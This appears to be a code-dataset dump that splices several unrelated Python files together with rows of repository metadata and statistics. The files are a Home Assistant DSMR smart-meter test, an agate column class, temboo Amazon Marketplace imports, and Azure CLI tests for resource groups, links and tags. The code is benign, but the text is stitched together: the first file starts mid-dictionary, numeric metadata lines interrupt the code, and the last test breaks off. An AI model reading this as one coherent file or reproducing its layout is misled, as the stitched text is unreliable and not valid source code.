BELGIUM_HOURLY_GAS_METER_READING: MBusObject(
[
{"value": datetime.datetime.fromtimestamp(1551642213)},
{"value": Decimal(745.695), "unit": "m3"},
]
),
ELECTRICITY_ACTIVE_TARIFF: CosemObject([{"value": "0001", "unit": ""}]),
}
mock_entry = MockConfigEntry(
domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
)
mock_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_entry.entry_id)
await hass.async_block_till_done()
telegram_callback = connection_factory.call_args_list[0][0][2]
# simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
telegram_callback(telegram)
# after receiving telegram entities need to have the chance to update
await asyncio.sleep(0)
# tariff should be translated in human readable and have no unit
power_tariff = hass.states.get("sensor.power_tariff")
assert power_tariff.state == "normal"
assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) is None
assert power_tariff.attributes.get(ATTR_ICON) == "mdi:flash"
assert power_tariff.attributes.get(ATTR_STATE_CLASS) is None
assert power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ""
# check if gas consumption is parsed correctly
gas_consumption = hass.states.get("sensor.gas_consumption")
assert gas_consumption.state == "745.695"
assert gas_consumption.attributes.get(ATTR_DEVICE_CLASS) is DEVICE_CLASS_GAS
assert (
gas_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
)
assert (
gas_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == VOLUME_CUBIC_METERS
)
async def test_belgian_meter_low(hass, dsmr_connection_fixture):
"""Test if Belgian meter is correctly parsed."""
(connection_factory, transport, protocol) = dsmr_connection_fixture
from dsmr_parser.obis_references import ELECTRICITY_ACTIVE_TARIFF
from dsmr_parser.objects import CosemObject
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "5B",
"precision": 4,
"reconnect_interval": 30,
"serial_id": "1234",
"serial_id_gas": "5678",
}
entry_options = {
"time_between_update": 0,
}
telegram = {ELECTRICITY_ACTIVE_TARIFF: CosemObject([{"value": "0002", "unit": ""}])}
mock_entry = MockConfigEntry(
domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
)
mock_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_entry.entry_id)
await hass.async_block_till_done()
telegram_callback = connection_factory.call_args_list[0][0][2]
# simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
telegram_callback(telegram)
# after receiving telegram entities need to have the chance to update
await asyncio.sleep(0)
# tariff should be translated in human readable and have no unit
power_tariff = hass.states.get("sensor.power_tariff")
assert power_tariff.state == "low"
assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) is None
assert power_tariff.attributes.get(ATTR_ICON) == "mdi:flash"
assert power_tariff.attributes.get(ATTR_STATE_CLASS) is None
assert power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ""
async def test_swedish_meter(hass, dsmr_connection_fixture):
"""Test if v5 meter is correctly parsed."""
(connection_factory, transport, protocol) = dsmr_connection_fixture
from dsmr_parser.obis_references import (
SWEDEN_ELECTRICITY_DELIVERED_TARIFF_GLOBAL,
SWEDEN_ELECTRICITY_USED_TARIFF_GLOBAL,
)
from dsmr_parser.objects import CosemObject
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "5S",
"precision": 4,
"reconnect_interval": 30,
"serial_id": None,
"serial_id_gas": None,
}
entry_options = {
"time_between_update": 0,
}
telegram = {
SWEDEN_ELECTRICITY_USED_TARIFF_GLOBAL: CosemObject(
[{"value": Decimal(123.456), "unit": ENERGY_KILO_WATT_HOUR}]
),
SWEDEN_ELECTRICITY_DELIVERED_TARIFF_GLOBAL: CosemObject(
[{"value": Decimal(654.321), "unit": ENERGY_KILO_WATT_HOUR}]
),
}
mock_entry = MockConfigEntry(
domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
)
mock_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_entry.entry_id)
await hass.async_block_till_done()
telegram_callback = connection_factory.call_args_list[0][0][2]
# simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
telegram_callback(telegram)
# after receiving telegram entities need to have the chance to update
await asyncio.sleep(0)
power_tariff = hass.states.get("sensor.energy_consumption_total")
assert power_tariff.state == "123.456"
assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_ENERGY
assert power_tariff.attributes.get(ATTR_ICON) is None
assert power_tariff.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
assert (
power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ENERGY_KILO_WATT_HOUR
)
power_tariff = hass.states.get("sensor.energy_production_total")
assert power_tariff.state == "654.321"
assert power_tariff.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
assert (
power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ENERGY_KILO_WATT_HOUR
)
async def test_tcp(hass, dsmr_connection_fixture):
"""If proper config provided TCP connection should be made."""
(connection_factory, transport, protocol) = dsmr_connection_fixture
entry_data = {
"host": "localhost",
"port": "1234",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
"serial_id": "1234",
"serial_id_gas": "5678",
}
mock_entry = MockConfigEntry(
domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data
)
mock_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_entry.entry_id)
await hass.async_block_till_done()
assert connection_factory.call_args_list[0][0][0] == "localhost"
assert connection_factory.call_args_list[0][0][1] == "1234"
async def test_connection_errors_retry(hass, dsmr_connection_fixture):
"""Connection should be retried on error during setup."""
(connection_factory, transport, protocol) = dsmr_connection_fixture
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 0,
"serial_id": "1234",
"serial_id_gas": "5678",
}
# override the mock to have it fail the first time and succeed after
first_fail_connection_factory = MagicMock(
return_value=(transport, protocol),
side_effect=chain([TimeoutError], repeat(DEFAULT)),
)
mock_entry = MockConfigEntry(
domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data
)
mock_entry.add_to_hass(hass)
with patch(
"homeassistant.components.dsmr.sensor.create_dsmr_reader",
first_fail_connection_factory,
):
await hass.config_entries.async_setup(mock_entry.entry_id)
await hass.async_block_till_done()
# wait for sleep to resolve
await hass.async_block_till_done()
assert first_fail_connection_factory.call_count >= 2, "connecting not retried"
async def test_reconnect(hass, dsmr_connection_fixture):
"""If transport disconnects, the connection should be retried."""
(connection_factory, transport, protocol) = dsmr_connection_fixture
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 0,
"serial_id": "1234",
"serial_id_gas": "5678",
}
# mock waiting coroutine while connection lasts
closed = asyncio.Event()
# Handshake so that `hass.async_block_till_done()` doesn't cycle forever
closed2 = asyncio.Event()
async def wait_closed():
await closed.wait()
closed2.set()
protocol.wait_closed = wait_closed
mock_entry = MockConfigEntry(
domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data
)
mock_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_entry.entry_id)
await hass.async_block_till_done()
assert connection_factory.call_count == 1
# indicate disconnect, release wait lock and allow reconnect to happen
closed.set()
# wait for lock set to resolve
await closed2.wait()
closed2.clear()
closed.clear()
await hass.async_block_till_done()
assert connection_factory.call_count >= 2, "connecting not retried"
# setting it so teardown can be successful
closed.set()
await hass.config_entries.async_unload(mock_entry.entry_id)
assert mock_entry.state == config_entries.ConfigEntryState.NOT_LOADED
| 33.431154
| 88
| 0.697009
| 2,927
| 24,037
| 5.419884
| 0.085412
| 0.037443
| 0.052509
| 0.052761
| 0.844239
| 0.811649
| 0.805913
| 0.785741
| 0.763805
| 0.753089
| 0
| 0.022053
| 0.205808
| 24,037
| 718
| 89
| 33.477716
| 0.808958
| 0.089653
| 0
| 0.651252
| 0
| 0
| 0.116468
| 0.027462
| 0
| 0
| 0
| 0
| 0.165703
| 1
| 0
| false
| 0
| 0.050096
| 0
| 0.050096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a9e97f68d27097c8bb028edc29a204ca3af1fef
| 158
|
py
|
Python
|
agate/columns/text.py
|
captainsafia/agate
|
14f41d13f72160a374d2504d9c9ade958f543eab
|
[
"MIT"
] | null | null | null |
agate/columns/text.py
|
captainsafia/agate
|
14f41d13f72160a374d2504d9c9ade958f543eab
|
[
"MIT"
] | null | null | null |
agate/columns/text.py
|
captainsafia/agate
|
14f41d13f72160a374d2504d9c9ade958f543eab
|
[
"MIT"
] | 1
|
2019-11-26T03:25:18.000Z
|
2019-11-26T03:25:18.000Z
|
#!/usr/bin/env python
from agate.columns.base import Column
class TextColumn(Column):
"""
A column containing unicode/string data.
"""
pass
| 15.8
| 44
| 0.670886
| 20
| 158
| 5.3
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21519
| 158
| 9
| 45
| 17.555556
| 0.854839
| 0.386076
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0aafa910e9e00a30e0b3db0561291bb43125fb39
| 1,089
|
py
|
Python
|
temboo/core/Library/Amazon/Marketplace/Orders/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Amazon/Marketplace/Orders/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Amazon/Marketplace/Orders/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Amazon.Marketplace.Orders.GetOrder import GetOrder, GetOrderInputSet, GetOrderResultSet, GetOrderChoreographyExecution
from temboo.Library.Amazon.Marketplace.Orders.GetServiceStatus import GetServiceStatus, GetServiceStatusInputSet, GetServiceStatusResultSet, GetServiceStatusChoreographyExecution
from temboo.Library.Amazon.Marketplace.Orders.ListOrderItems import ListOrderItems, ListOrderItemsInputSet, ListOrderItemsResultSet, ListOrderItemsChoreographyExecution
from temboo.Library.Amazon.Marketplace.Orders.ListOrders import ListOrders, ListOrdersInputSet, ListOrdersResultSet, ListOrdersChoreographyExecution
from temboo.Library.Amazon.Marketplace.Orders.ListOrdersWithBuyerEmail import ListOrdersWithBuyerEmail, ListOrdersWithBuyerEmailInputSet, ListOrdersWithBuyerEmailResultSet, ListOrdersWithBuyerEmailChoreographyExecution
from temboo.Library.Amazon.Marketplace.Orders.ListOrdersWithSellerOrderId import ListOrdersWithSellerOrderId, ListOrdersWithSellerOrderIdInputSet, ListOrdersWithSellerOrderIdResultSet, ListOrdersWithSellerOrderIdChoreographyExecution
| 155.571429
| 233
| 0.917355
| 72
| 1,089
| 13.875
| 0.430556
| 0.06006
| 0.102102
| 0.138138
| 0.24024
| 0.24024
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038567
| 1,089
| 6
| 234
| 181.5
| 0.954155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0ac8419e84f39e10b61869d327cebfa6015d19df
| 172,049
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/resource/tests/latest/test_resource.py
|
sudokylumaster/azure-cli
|
5bbb75e4860dcd086ca8b4c413a64acb9a6dbb2f
|
[
"MIT"
] | 1
|
2021-02-19T02:54:09.000Z
|
2021-02-19T02:54:09.000Z
|
src/azure-cli/azure/cli/command_modules/resource/tests/latest/test_resource.py
|
sudokylumaster/azure-cli
|
5bbb75e4860dcd086ca8b4c413a64acb9a6dbb2f
|
[
"MIT"
] | null | null | null |
src/azure-cli/azure/cli/command_modules/resource/tests/latest/test_resource.py
|
sudokylumaster/azure-cli
|
5bbb75e4860dcd086ca8b4c413a64acb9a6dbb2f
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import json
import os
import shutil
import time
import mock
import unittest
from azure.cli.core.parser import IncorrectUsageError
from azure_devtools.scenario_tests.const import MOCKED_SUBSCRIPTION_ID
from azure_devtools.scenario_tests import AllowLargeResponse
from azure.cli.testsdk import (ScenarioTest, LocalContextScenarioTest, LiveScenarioTest, ResourceGroupPreparer, StorageAccountPreparer,
create_random_name, live_only, record_only)
from azure.cli.core.util import get_file_json
from knack.util import CLIError
class ResourceGroupScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_rg_scenario')
def test_resource_group(self, resource_group):
self.cmd('group delete -n {rg} --yes')
self.cmd('group exists -n {rg}',
checks=self.check('@', False))
self.cmd('group create -n {rg} -l westus --tag a=b c --managed-by test_admin', checks=[
self.check('name', '{rg}'),
self.check('tags', {'a': 'b', 'c': ''}),
self.check('managedBy', 'test_admin')
])
self.cmd('group exists -n {rg}',
checks=self.check('@', True))
self.cmd('group show -n {rg}', checks=[
self.check('name', '{rg}'),
self.check('tags', {'a': 'b', 'c': ''})
])
self.cmd('group list --tag a=b', checks=[
self.check('[0].name', '{rg}'),
self.check('[0].tags', {'a': 'b', 'c': ''})
])
# test --force-string
self.kwargs.update({'tag': "\"{\\\"k\\\":\\\"v\\\"}\""})
self.cmd('group update -g {rg} --tags ""',
checks=self.check('tags', {}))
self.cmd('group update -g {rg} --set tags.a={tag}',
checks=self.check('tags.a', "{{'k': 'v'}}"))
self.cmd('group update -g {rg} --set tags.b={tag} --force-string',
checks=self.check('tags.b', '{{\"k\":\"v\"}}'))
result = self.cmd('group export --name {rg} --query "contentVersion"')
self.assertEqual('"1.0.0.0"\n', result.output)
@ResourceGroupPreparer(name_prefix='cli_test_rg_scenario')
def test_resource_group_export_skip_all_params(self, resource_group):
self.kwargs.update({
'vnet': 'vnet1'
})
self.cmd('network vnet create -g {rg} -n {vnet}')
self.kwargs['vnet_id'] = self.cmd('network vnet show -g {rg} -n {vnet}').get_output_in_json()['id']
result = self.cmd('group export --name {rg} --resource-ids "{vnet_id}" --skip-all-params --query "parameters"')
self.assertEqual('{}\n', result.output)
@ResourceGroupPreparer(name_prefix='cli_test_rg_scenario')
def test_resource_group_export_skip_resource_name_params(self, resource_group):
self.kwargs.update({
'vnet': 'vnet1'
})
self.cmd('network vnet create -g {rg} -n {vnet}')
self.kwargs['vnet_id'] = self.cmd('network vnet show -g {rg} -n {vnet}').get_output_in_json()['id']
result = self.cmd('group export --name {rg} --resource-ids "{vnet_id}" --skip-resource-name-params --query "parameters"')
self.assertEqual('{}\n', result.output)
class ResourceGroupNoWaitScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_rg_nowait_test')
def test_resource_group_no_wait(self, resource_group):
self.cmd('group delete -n {rg} --no-wait --yes',
checks=self.is_empty())
self.cmd('group wait --deleted -n {rg}',
checks=self.is_empty())
self.cmd('group exists -n {rg}',
checks=self.check('@', False))
self.cmd('group create -n {rg} -l westus --managed-by test_admin', checks=[
self.check('name', '{rg}'),
self.check('managedBy', 'test_admin')
])
self.cmd('group exists -n {rg}',
checks=self.check('@', True))
self.cmd('group wait --exists -n {rg}',
checks=self.is_empty())
class ResourceLinkScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_resource_link_scenario')
def test_resource_link_scenario(self, resource_group):
self.kwargs.update({
'vnet': 'vnet1'
})
self.cmd('network vnet create -g {rg} -n {vnet}')
self.kwargs['vnet_id'] = self.cmd('network vnet show -g {rg} -n {vnet}').get_output_in_json()['id']
rg_id = self.cmd('group show -g {rg}').get_output_in_json()['id']
self.kwargs['link_id'] = '{}/providers/Microsoft.Resources/links/link1'.format(rg_id)
self.cmd('resource link create --link {link_id} --target {vnet_id} --notes "blah notes"')
self.cmd('resource link show --link {link_id}', checks=[
self.check('name', 'link1'),
self.check('properties.notes', 'blah notes')
])
self.cmd('resource link update --link {link_id} --target {vnet_id} --notes "group to vnet"')
num_link = int(self.cmd('resource link list --query length(@) -o tsv').output)
self.cmd('resource link show --link {link_id}', checks=[
self.check('name', 'link1'),
self.check('properties.notes', 'group to vnet')
])
self.cmd('resource link delete --link {link_id}')
self.cmd('resource link list',
checks=self.check('length(@)', num_link - 1))
class ResourceScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_resource_scenario', location='southcentralus')
@AllowLargeResponse()
def test_resource_scenario(self, resource_group, resource_group_location):
self.kwargs.update({
'loc': resource_group_location,
'vnet': self.create_random_name('vnet-', 30),
'subnet': self.create_random_name('subnet-', 30),
'rt': 'Microsoft.Network/virtualNetworks'
})
vnet_count = self.cmd("resource list --query \"length([?name=='{vnet}'])\"").get_output_in_json() or 0
self.cmd('network vnet create -g {rg} -n {vnet} --subnet-name {subnet} --tags cli-test=test')
vnet_count += 1
self.cmd('resource list',
checks=self.check("length([?name=='{vnet}'])", vnet_count))
self.cmd('resource list -l {loc}',
checks=self.check("length([?location == '{loc}']) == length(@)", True))
self.cmd('resource list --resource-type {rt}',
checks=self.check("length([?name=='{vnet}'])", vnet_count))
self.cmd('resource list --name {vnet}', checks=[
self.check("length([?name=='{vnet}'])", vnet_count),
self.check('[0].provisioningState', 'Succeeded')
])
self.cmd('resource list --tag cli-test',
checks=self.check("length([?name=='{vnet}'])", vnet_count))
self.cmd('resource list --tag cli-test=test',
checks=self.check("length([?name=='{vnet}'])", vnet_count))
# check for simple resource with tag
self.cmd('resource show -n {vnet} -g {rg} --resource-type Microsoft.Network/virtualNetworks', checks=[
self.check('name', '{vnet}'),
self.check('location', '{loc}'),
self.check('resourceGroup', '{rg}'),
self.check('tags', {'cli-test': 'test'})
])
# check for child resource
self.cmd('resource show -n {subnet} -g {rg} --namespace Microsoft.Network --parent virtualNetworks/{vnet} --resource-type subnets', checks=[
self.check('name', '{subnet}'),
self.check('resourceGroup', '{rg}')
])
# clear tag and verify
self.cmd('resource tag -n {vnet} -g {rg} --resource-type Microsoft.Network/virtualNetworks --tags')
self.cmd('resource show -n {vnet} -g {rg} --resource-type Microsoft.Network/virtualNetworks',
checks=self.check('tags', {}))
# delete and verify
self.cmd('resource delete -n {vnet} -g {rg} --resource-type {rt}')
time.sleep(10)
self.cmd('resource list', checks=self.check("length([?name=='{vnet}'])", 0))
class ResourceIDScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_resource_id')
def test_resource_id_scenario(self, resource_group):
self.kwargs.update({
'vnet': 'cli_test_resource_id_vnet',
'subnet': 'cli_test_resource_id_subnet'
})
self.cmd('network vnet create -g {rg} -n {vnet} --subnet-name {subnet}')
self.kwargs['sub'] = self.get_subscription_id()
self.kwargs['vnet_id'] = '/subscriptions/{sub}/resourceGroups/{rg}/providers/Microsoft.Network/virtualNetworks/{vnet}'.format(
**self.kwargs)
self.cmd('resource tag --id {vnet_id} --tags tag-vnet')
self.cmd('resource show --id {vnet_id}', checks=[
self.check('name', '{vnet}'),
self.check('resourceGroup', '{rg}'),
self.check('tags', {'tag-vnet': ''})
])
self.kwargs['subnet_id'] = '/subscriptions/{sub}/resourceGroups/{rg}/providers/Microsoft.Network/virtualNetworks/{vnet}/subnets/{subnet}'.format(
**self.kwargs)
self.cmd('resource show --id {subnet_id}', checks=[
self.check('name', '{subnet}'),
self.check('resourceGroup', '{rg}'),
self.check('properties.addressPrefix', '10.0.0.0/24')
])
self.cmd('resource update --id {subnet_id} --set properties.addressPrefix=10.0.0.0/22',
checks=self.check('properties.addressPrefix', '10.0.0.0/22'))
self.cmd('resource delete --id {subnet_id}', checks=self.is_empty())
self.cmd('resource delete --id {vnet_id}', checks=self.is_empty())
class ResourceGenericUpdate(LiveScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_generic_update')
def test_resource_generic_update(self, resource_group):
self.kwargs.update({
'stor_1': self.create_random_name(prefix='stor1', length=10),
'stor_2': self.create_random_name(prefix='stor2', length=10)
})
# create storage accounts
self.cmd('az storage account create -g {rg} -n {stor_1}')
self.cmd('az storage account create -g {rg} -n {stor_2}')
# get ids
self.kwargs['stor_ids'] = " ".join(self.cmd('az storage account list -g {rg} --query "[].id"').get_output_in_json())
# update tags
self.cmd('az storage account update --ids {stor_ids} --set tags.isTag=True tags.isNotTag=False')
self.cmd('az storage account show --name {stor_1} -g {rg}', checks=[
self.check('tags.isTag', 'True'),
self.check('tags.isNotTag', 'False')
])
self.cmd('az storage account show --name {stor_2} -g {rg}', checks=[
self.check('tags.isTag', 'True'),
self.check('tags.isNotTag', 'False')
])
# delete tags.isTag
self.cmd('az storage account update --ids {stor_ids} --remove tags.isTag')
self.cmd('az storage account show --name {stor_1} -g {rg} --query "tags"', checks=[
self.check('isNotTag', 'False'),
self.check('isTag', None)
])
self.cmd('az storage account show --name {stor_2} -g {rg} --query "tags"', checks=[
self.check('isNotTag', 'False'),
self.check('isTag', None)
])
# delete tags.isNotTag
self.cmd('az storage account update --ids {stor_ids} --remove tags.isNotTag')
# check tags is empty.
self.cmd('az storage account show --name {stor_1} -g {rg} --query "tags"', checks=self.is_empty())
self.cmd('az storage account show --name {stor_2} -g {rg} --query "tags"', checks=self.is_empty())
class ResourceCreateAndShowScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_resource_create')
def test_resource_create_and_show(self, resource_group, resource_group_location):
self.kwargs.update({
'plan': 'cli_res_create_plan',
'app': 'clirescreateweb2',
'loc': resource_group_location
})
self.cmd('resource create -g {rg} -n {plan} --resource-type Microsoft.web/serverFarms --is-full-object --properties "{{\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"B1\\",\\"tier\\":\\"BASIC\\"}}}}"',
checks=self.check('name', '{plan}'))
result = self.cmd('resource create -g {rg} -n {app} --resource-type Microsoft.web/sites --properties "{{\\"serverFarmId\\":\\"{plan}\\"}}"',
checks=self.check('name', '{app}')).get_output_in_json()
self.kwargs['app_settings_id'] = result['id'] + '/config/appsettings'
self.kwargs['app_config_id'] = result['id'] + '/config/web'
self.cmd('resource create --id {app_settings_id} --properties "{{\\"key2\\":\\"value12\\"}}"',
checks=[self.check('properties.key2', 'value12')])
self.cmd('resource show --id {app_config_id}',
checks=self.check('properties.publishingUsername', '${app}'))
self.cmd('resource show --id {app_config_id} --include-response-body',
checks=self.check('responseBody.properties.publishingUsername', '${app}'))
class TagScenarioTest(ScenarioTest):
def test_tag_scenario(self):
self.kwargs.update({
'tag': 'cli_test_tag'
})
tag_values = self.cmd('tag list --query "[?tagName == \'{tag}\'].values[].tagValue"').get_output_in_json()
for tag_value in tag_values:
self.cmd('tag remove-value --value {} -n {{tag}}'.format(tag_value))
self.cmd('tag delete -n {tag} -y')
self.cmd('tag list --query "[?tagName == \'{tag}\']"', checks=self.is_empty())
self.cmd('tag create -n {tag}', checks=[
self.check('tagName', '{tag}'),
self.check('values', []),
self.check('count.value', 0)
])
self.cmd('tag add-value -n {tag} --value test')
self.cmd('tag add-value -n {tag} --value test2')
self.cmd('tag list --query "[?tagName == \'{tag}\']"',
checks=self.check('[].values[].tagValue', [u'test', u'test2']))
self.cmd('tag remove-value -n {tag} --value test')
self.cmd('tag list --query "[?tagName == \'{tag}\']"',
checks=self.check('[].values[].tagValue', [u'test2']))
self.cmd('tag remove-value -n {tag} --value test2')
self.cmd('tag list --query "[?tagName == \'{tag}\']"',
checks=self.check('[].values[].tagValue', []))
self.cmd('tag delete -n {tag} -y')
self.cmd('tag list --query "[?tagName == \'{tag}\']"',
checks=self.is_empty())
@ResourceGroupPreparer(name_prefix='cli_test_tag_update_by_patch', location='westus')
def test_tag_update_by_patch(self, resource_group, resource_group_location):
# Test Microsoft.RecoveryServices/vaults
self.kwargs.update({
'loc': resource_group_location,
'vault': self.create_random_name('vault-', 30),
'tag': 'cli-test=test',
'resource_group_id': '/subscriptions/' + self.get_subscription_id() + '/resourceGroups/' + resource_group
})
vault = self.cmd('resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults '
'--is-full-object -p "{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",'
'\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
checks=self.check('name', '{vault}')).get_output_in_json()
self.kwargs['vault_id'] = vault['id']
self.cmd('resource tag --ids {vault_id} --tags {tag}', checks=self.check('tags', {'cli-test': 'test'}))
self.cmd('resource tag --ids {vault_id} --tags', checks=self.check('tags', {}))
# Test Microsoft.Resources/resourceGroups
self.cmd('resource tag --ids {resource_group_id} --tags {tag}',
checks=self.check('tags', {'cli-test': 'test'}))
# Test Microsoft.ContainerRegistry/registries/webhooks
self.kwargs.update({
'registry_name': self.create_random_name('clireg', 20),
'webhook_name': 'cliregwebhook',
'rg_loc': resource_group_location,
'uri': 'http://www.microsoft.com',
'actions': 'push',
'sku': 'Standard'
})
self.cmd('acr create -n {registry_name} -g {rg} -l {rg_loc} --sku {sku}',
checks=[self.check('name', '{registry_name}')])
webhook = self.cmd('acr webhook create -n {webhook_name} -r {registry_name} --uri {uri} --actions {actions}',
checks=[self.check('name', '{webhook_name}')]).get_output_in_json()
self.kwargs['webhook_id'] = webhook['id']
self.cmd('resource tag --ids {webhook_id} --tags {tag}', checks=self.check('tags', {'cli-test': 'test'}))
self.cmd('resource tag --ids {webhook_id} --tags', checks=self.check('tags', {}))
# Test Microsoft.ContainerInstance/containerGroups
self.kwargs.update({
'container_group_name': self.create_random_name('clicontainer', 16),
'image': 'nginx:latest',
})
container = self.cmd('container create -g {rg} -n {container_group_name} --image {image}',
checks=self.check('name', '{container_group_name}')).get_output_in_json()
self.kwargs['container_id'] = container['id']
self.cmd('resource tag --ids {container_id} --tags {tag}', checks=self.check('tags', {'cli-test': 'test'}))
self.cmd('resource tag --ids {container_id} --tags', checks=self.check('tags', {}))
self.cmd('resource tag --ids {vault_id} {webhook_id} {container_id} --tags {tag}', checks=[
self.check('length(@)', 3),
self.check('[0].tags', {'cli-test': 'test'})
])
self.cmd('resource delete --id {vault_id}', checks=self.is_empty())
self.cmd('resource delete --id {webhook_id}', checks=self.is_empty())
@ResourceGroupPreparer(name_prefix='cli_test_tag_incrementally', location='westus')
def test_tag_incrementally(self, resource_group, resource_group_location):
self.kwargs.update({
'loc': resource_group_location,
'vault': self.create_random_name('vault-', 30),
})
resource = self.cmd(
'resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults --is-full-object -p "{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
checks=self.check('name', '{vault}')).get_output_in_json()
self.kwargs['vault_id'] = resource['id']
self.cmd('resource tag --ids {vault_id} --tags cli-test=test cli-test2=test2', checks=self.check('tags', {'cli-test': 'test', 'cli-test2': 'test2'}))
self.cmd('resource tag --ids {vault_id} --tags cli-test3=test3 cli-test4=test4', checks=self.check('tags', {'cli-test3': 'test3', 'cli-test4': 'test4'}))
self.cmd('resource tag --ids {vault_id} --tags cli-test4=test4a cli-test5=test5 -i',
checks=self.check('tags', {'cli-test3': 'test3', 'cli-test4': 'test4a', 'cli-test5': 'test5'}))
with self.assertRaises(CLIError):
self.cmd('resource tag --ids {vault_id} --tags -i ')
with self.assertRaises(CLIError):
self.cmd('resource tag --ids {vault_id} --tags "" -i ')
self.cmd('resource tag --ids {vault_id} --tags', checks=self.check('tags', {}))
self.cmd('resource delete --id {vault_id}', checks=self.is_empty())
@ResourceGroupPreparer(name_prefix='cli_test_tag_default_location_scenario', location='westus')
def test_tag_default_location_scenario(self, resource_group, resource_group_location):
self.kwargs.update({
'loc': resource_group_location,
'vault': self.create_random_name('vault-', 30),
'tag': 'cli-test=test'
})
resource = self.cmd(
'resource create -g {rg} -n {vault} --resource-type Microsoft.RecoveryServices/vaults --is-full-object -p '
'"{{\\"properties\\":{{}},\\"location\\":\\"{loc}\\",\\"sku\\":{{\\"name\\":\\"Standard\\"}}}}"',
checks=self.check('name', '{vault}')).get_output_in_json()
self.kwargs['vault_id'] = resource['id']
self.cmd('resource tag --ids {vault_id} --tags {tag}', checks=self.check('tags', {'cli-test': 'test'}))
# Scenarios with default location
self.cmd('configure --defaults location={loc}')
with self.assertRaises(IncorrectUsageError):
self.cmd('resource list --tag {tag}')
with self.assertRaises(IncorrectUsageError):
self.cmd('resource list --tag {tag} -l westus')
